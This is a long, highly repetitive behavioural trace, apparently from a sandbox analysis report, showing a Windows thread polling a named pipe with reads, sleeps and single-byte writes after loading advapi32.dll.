File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
For performance reasons, the remaining 2390 entries are omitted. The remaining entries can be found in glog.xml.

Thread 0xbc8

3214

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	2	Fn
File	Create Pipe	pipe_name = \device\namedpipe\3220lacesomepipe, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, max_instances = 1	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
